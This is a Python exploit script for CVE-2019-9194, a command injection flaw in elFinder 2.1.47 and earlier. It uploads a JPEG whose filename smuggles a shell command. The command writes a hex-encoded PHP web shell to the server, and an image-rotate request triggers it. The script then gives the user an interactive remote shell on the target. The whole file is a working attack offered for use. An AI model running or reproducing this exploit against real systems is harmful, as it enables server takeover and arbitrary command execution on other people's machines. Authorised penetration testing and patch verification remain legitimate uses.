#!/usr/bin/env python3
"""
CVE-2019-9194 - elFinder <= 2.1.47 Command Injection
Usage: python3 exploit.py http://TARGET
"""

import requests
import json
import sys

SHELL_FILENAME = "SecSignal.php"

# Filename payload: injects command that writes a PHP webshell
# The hex decodes to: <?php system($_GET["c"]); ?>
UPLOAD_FILENAME = (
    "SecSignal.jpg;"
    "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a "
    f"| xxd -r -p > {SHELL_FILENAME};"
    "echo SecSignal.jpg"
)

# Minimal valid JPEG (source: https://github.com/mathiasbynens/small/blob/master/jpeg.jpg)
JPEG = bytes([
    0xFF,0xD8,0xFF,0xDB,0x00,0x43,0x00,0x03,0x02,0x02,0x02,0x02,0x02,0x03,0x02,0x02,
    0x02,0x03,0x03,0x03,0x03,0x04,0x06,0x04,0x04,0x04,0x04,0x04,0x08,0x06,0x06,0x05,
    0x06,0x09,0x08,0x0A,0x0A,0x09,0x08,0x09,0x09,0x0A,0x0C,0x0F,0x0C,0x0A,0x0B,0x0E,
    0x0B,0x09,0x09,0x0D,0x11,0x0D,0x0E,0x0F,0x10,0x10,0x11,0x10,0x0A,0x0C,0x12,0x13,
    0x12,0x10,0x13,0x0F,0x10,0x10,0x10,0xFF,0xC9,0x00,0x0B,0x08,0x00,0x01,0x00,0x01,
    0x01,0x01,0x11,0x00,0xFF,0xCC,0x00,0x06,0x00,0x10,0x10,0x05,0xFF,0xDA,0x00,0x08,
    0x01,0x01,0x00,0x00,0x3F,0x00,0xD2,0xCF,0x20,0xFF,0xD9,
])


def upload(url: str) -> str:
    files = {"upload[]": (UPLOAD_FILENAME, JPEG, "image/jpeg")}
    data = {
        "reqid":   "1693222c439f4",
        "cmd":     "upload",
        "target":  "l1_Lw",
        "mtime[]": "1497726174",
    }
    r = requests.post(f"{url}/php/connector.minimal.php", files=files, data=data)
    r.raise_for_status()
    return json.loads(r.text)["added"][0]["hash"]


def img_rotate(url: str, file_hash: str) -> None:
    params = {
        "target":  file_hash,
        "width":   "539",
        "height":  "960",
        "degree":  "180",
        "quality": "100",
        "bg":      "",
        "mode":    "rotate",
        "cmd":     "resize",
        "reqid":   "169323550af10c",
    }
    requests.get(f"{url}/php/connector.minimal.php", params=params)


def shell(url: str) -> None:
    r = requests.get(f"{url}/php/{SHELL_FILENAME}")
    if r.status_code == 200:
        print("[+] Pwned!")
        print("[+] Interactive shell (Ctrl+C to exit)\n")
        while True:
            try:
                cmd = input("$ ").strip()
                if not cmd:
                    continue
                out = requests.get(f"{url}/php/{SHELL_FILENAME}", params={"c": cmd})
                print(out.text.strip())
            except KeyboardInterrupt:
                print("\nBye!")
                sys.exit(0)
    else:
        print(f"[-] Shell not found (HTTP {r.status_code}). Target may not be vulnerable.")


def main():
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} http://TARGET")
        sys.exit(1)

    url = sys.argv[1].rstrip("/")

    print("[*] Uploading malicious image...")
    file_hash = upload(url)
    print(f"[*] File uploaded, hash: {file_hash}")

    print("[*] Triggering command injection via image rotation...")
    img_rotate(url, file_hash)

    print("[*] Checking for webshell...")
    shell(url)


if __name__ == "__main__":
    main()